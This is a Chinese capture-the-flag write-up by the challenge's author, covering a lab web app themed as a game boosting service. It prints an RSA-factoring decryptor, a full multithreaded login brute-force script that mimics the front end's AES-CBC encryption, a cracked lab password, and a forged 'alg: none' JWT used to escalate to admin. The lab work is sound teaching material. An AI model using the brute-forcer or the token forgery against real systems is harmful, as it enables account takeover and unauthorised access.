出题——你的魔王护一般

前言

这次出题考察越权漏洞 + 信息收集 + JWT + Crypto

JavaScript 接口泄露

/static/js/

打开主页是一个三角洲陪玩主题的官网

逛了一圈没有太多的功能点去测试,于是去注册一个账号

注册一个打手进去没发现啥东西

当以普通用户登录时会多出一个下单功能

在 BP 中发现我们的登录是有做加密的,并且返回了两个 Token

观察到 /api/order/available-boosters 接口返回的是所有打手的信息,里面包含了 username,可惜是加密的

使用插件 XMCVE-WebRecon 进行信息收集发现 /api/ 接口所在的具体文件都是在 /static/js/ 这个目录下面

于是对这个目录进行爆破,发现了 api.js

访问一看做了混淆

级别不是很高,AI 可以梭哈出来关键信息

得到 /api/v2/userlist 以及 /api/rsa_gen

第一个接口则是假接口

第二个接口则是拿到了 RSA 的公钥

Crypto

RSA(分解 n)

扔给 AI 分析得到指数 e 为 65537

将 n 分解可以得到两个质数

1
2
P = 112840243732455789648197748865738103507498045177858510412060728452781414555669
Q = 112840243732455789648197748865738103507498045177858510412060728452781414556103

于是编写解密脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import base64
from Crypto.Cipher import PKCS1_v1_5
from Crypto.PublicKey import RSA
from Crypto.Util.number import inverse

P = 112840243732455789648197748865738103507498045177858510412060728452781414555669
Q = 112840243732455789648197748865738103507498045177858510412060728452781414556103
E = 65537
ENC = [
    "",
]

n = P * Q
d = inverse(E, (P - 1) * (Q - 1))
key = RSA.construct((n, E, d, P, Q))
cipher = PKCS1_v1_5.new(key)

usernames = []
for c in ENC:
    plain = cipher.decrypt(base64.b64decode(c), sentinel := object())
    if plain is sentinel:
        raise ValueError("解密失败")
    usernames.append(plain.decode())

print(usernames)

得到 username 为

1
2
3
4
5
kilo
raven
merc
frost
……

JavaScript 逆向

login_crypto.js(无限 Debugger 绕过)

拿到用户名之后可以尝试去爆破这些打手的账号,但密码在前面发现是加密的

于是去逆向,有无限 Debugger

还是用上面那个插件绕过

Ctrl + Shift + F 搜索大法定位到文件位置——login_crypto.js

这个代码没有做混淆,也直接给出了 Key 以及 IV,往下看就能发现是 AES-CBC 模式

弱口令

/api/account/login

编写加密脚本去爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
import argparse
import base64
import json
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from pathlib import Path

import requests
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad


LOGIN_AES_KEY = bytes(
    [0x44, 0x46, 0x2D, 0x6C, 0x6F, 0x67, 0x69, 0x6E, 0x2D, 0x6B, 0x65, 0x79, 0x2D, 0x31, 0x36, 0x21]
)
LOGIN_AES_IV = bytes(
    [0x31, 0x36, 0x2D, 0x62, 0x79, 0x74, 0x65, 0x2D, 0x6C, 0x6F, 0x67, 0x69, 0x6E, 0x2D, 0x69, 0x76]
)


def encrypt_password(password: str) -> str:
    cipher = AES.new(LOGIN_AES_KEY, AES.MODE_CBC, LOGIN_AES_IV)
    ciphertext = cipher.encrypt(pad(password.encode("utf-8"), AES.block_size))
    return base64.b64encode(ciphertext).decode("ascii")


def build_headers(base_url: str, user_agent: str):
    origin = base_url.rstrip("/")
    return {
        "Accept": "*/*",
        "Content-Type": "application/json",
        "Origin": origin,
        "Referer": f"{origin}/login",
        "User-Agent": user_agent,
    }


def attempt_login(session: requests.Session, base_url: str, username: str, password: str, timeout: int, headers: dict):
    encrypted_password = encrypt_password(password)
    payload = {"username": username, "password": encrypted_password}
    response = session.post(
        f"{base_url.rstrip('/')}/api/account/login",
        headers=headers,
        json=payload,
        timeout=timeout,
    )
    return password, payload, response


def iter_passwords(wordlist_path: str):
    path = Path(wordlist_path)
    with path.open("r", encoding="utf-8", errors="ignore") as handle:
        for line in handle:
            candidate = line.strip("\r\n")
            if not candidate:
                continue
            yield candidate


def main():
    parser = argparse.ArgumentParser(description="模拟前端 AES-CBC 登录并支持基于字典爆破")
    parser.add_argument("--base-url", default="http://172.24.15.213:8000", help="目标站点地址,例如 http://127.0.0.1:8000")
    parser.add_argument("--username", required=True, help="登录用户名")
    parser.add_argument("--password", help="单个明文密码(不爆破时使用)")
    parser.add_argument("--wordlist", help="密码字典路径,例如 rockyou.txt(启用爆破)")
    parser.add_argument("--timeout", type=int, default=10, help="请求超时时间,单位秒")
    parser.add_argument("--threads", type=int, default=8, help="并发线程数(爆破时使用)")
    parser.add_argument("--max", type=int, default=0, help="最多尝试多少条密码(0 表示不限制)")
    parser.add_argument("--delay", type=float, default=0.0, help="每次请求之间的延迟秒数(爆破时使用)")
    parser.add_argument("--user-agent", default="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36", help="User-Agent")
    args = parser.parse_args()

    base_url = args.base_url.rstrip("/")
    headers = build_headers(base_url, args.user_agent)

    if args.wordlist:
        stop_event = threading.Event()
        attempts = 0

        def worker(password: str):
            nonlocal attempts
            if stop_event.is_set():
                return None
            if args.max and attempts >= args.max:
                stop_event.set()
                return None
            if args.delay:
                time.sleep(args.delay)
            with attempts_lock:
                if args.max and attempts >= args.max:
                    stop_event.set()
                    return None
                attempts += 1
            with requests.Session() as session:
                pw, payload, response = attempt_login(session, base_url, args.username, password, args.timeout, headers)
            ok = response.status_code == 200
            data = {}
            try:
                data = response.json()
            except ValueError:
                data = {}
            if ok and data.get("access_token"):
                return {"password": pw, "payload": payload, "response": data}
            return None

        attempts_lock = threading.Lock()
        print(f"[*] Brute force: {args.username} @ {base_url} | wordlist={args.wordlist} | threads={args.threads}")

        with ThreadPoolExecutor(max_workers=max(1, args.threads)) as executor:
            futures = []
            for pw in iter_passwords(args.wordlist):
                if stop_event.is_set():
                    break
                futures.append(executor.submit(worker, pw))
                if args.max and len(futures) >= args.max:
                    break

            for future in as_completed(futures):
                result = future.result()
                if result:
                    stop_event.set()
                    print("[+] Found password:")
                    print(result["password"])
                    print("[+] Request JSON:")
                    print(json.dumps(result["payload"], ensure_ascii=False))
                    print("[+] Response JSON:")
                    print(json.dumps(result["response"], ensure_ascii=False, indent=2))
                    return

        print("[!] No password found")
        return

    if not args.password:
        raise SystemExit("需要提供 --password 或 --wordlist")

    with requests.Session() as session:
        password, payload, response = attempt_login(session, base_url, args.username, args.password, args.timeout, headers)

    print("[*] Request JSON:")
    print(json.dumps(payload, ensure_ascii=False, indent=2))
    print(f"[*] HTTP {response.status_code}")
    print("[*] Response JSON:")
    try:
        print(json.dumps(response.json(), ensure_ascii=False, indent=2))
    except ValueError:
        print(response.text)


if __name__ == "__main__":
    main()

最后爆破出打手 kilo 的密码为 letmein(只有这位打手能拿到下一关的线索)

JWT

JWT 空算法漏洞

登录后可以看到客服留言

替换掉 localhost 为靶机 IP 去访问返回 401

查看历史包发现在我们登录后每次请求都会携带 x-access-token 以及 JWT

去掉 x-access-token 后也不能访问接口了,所以两个都必带

再次访问发现回显 403 权限不够

联想到空算法漏洞,利用 JWT alg: none 伪造 admin 身份,越权读取

1
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwic2NvcGUiOiJyZXdhcmQifQ.

拿到 flag